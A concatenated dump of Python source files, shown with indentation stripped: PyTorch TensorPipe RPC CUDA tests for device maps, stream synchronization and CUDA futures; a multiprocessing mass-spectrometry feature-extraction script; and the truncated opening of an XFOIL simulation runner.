def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 will get the out RRef and call to_here() and hence, needs
# to configure devcie map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
|
mp_multifile.py
|
import sys
# import mss
sys.path.append('../')
from mss import mssmain as msm
from mss import align
import multiprocessing
from timeit import default_timer as timer
import glob
import pandas as pd
def main():
start = timer()
input_path = str(input('file path (folder): \n'))
print(glob.glob(input_path + '*.mzML'))
output_path = input('output path (.csv): \n')
noise_thres = int(input('noise threshold: \n'))
error_ppm = int(input('feature extraction error (ppm): \n'))
rt_error = float(input('alignment rt error (min): \n'))
mz_error = float(input('alignment mz error (Da): \n'))
all_scans, file_names = msm.batch_scans(input_path, remove_noise=True, thres_noise=noise_thres)
file_list = [input_path + str(i) + '.csv' for i in file_names]
files = list(zip(all_scans, file_list))
jobs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
for scans in files:
p = multiprocessing.Process(target=msm.mp_peak_list, args=(scans[0], scans[1], error_ppm, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
df_list = return_dict.values() # Check the order of the dict value!
alignment = align.mss_align(df_list, output_path, return_dict.keys(), RT_error=rt_error, mz_error=mz_error)
end = timer()
print(f'elapsed time: {end - start}')
return
if __name__ == '__main__':
main()
|
stepRunXFOILSimulationWithSearch.py
|
import json
import os.path
import posixpath
import platform
import sys
import time
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
